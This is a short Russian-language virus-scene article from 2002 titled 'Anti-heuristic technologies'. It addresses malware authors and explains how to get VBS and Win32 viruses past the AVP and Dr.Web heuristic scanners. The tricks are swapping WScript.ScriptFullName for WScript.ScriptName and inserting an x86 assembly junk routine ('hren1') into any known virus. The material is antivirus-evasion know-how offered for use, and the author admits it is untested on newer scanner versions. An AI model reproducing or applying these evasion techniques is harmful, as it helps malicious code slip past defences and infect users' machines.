Антиэвристические технологии

Вам не нравится, что АВП и ВЕБ ругаются на вашего нового VBS виря? Так это не беда! Ругаются они на одну фразу - WScript.ScriptFullName - которая дает нам полное имя выполняющегося скрипта (т.е. нас). И вроде никуда от этого не деться, но выход есть - WScript.ScriptName - енто наше имя, но без пути к нему (который в принципе не очень важен). На сем оба евристика замолкают.

А вот на чем евристика АВП обламывается по самое нехочу. Вставляем в любой ИЗВЕСТНЫЙ Вынь32 вирь вызов процедуры hren1 где нибудь в начале и ..... все подозрения с файла сразу снимаются.

hren1:
	and	eax,eax
	jz	hren3
	call	hren2
hren3:
	xor ax,bx
	pushfd
	sub edi,20h
	pop eax
	ret       
hren2:
	mov ecx,200h
@@qq1:	nop
	aad
	loop @@qq1	
	ret

ЗЫ: примеры не тестировались на новейших версиях указанных выше докторов. Хотя вряд ли там что-нибудь изменилось :))

© NeKr0! 2002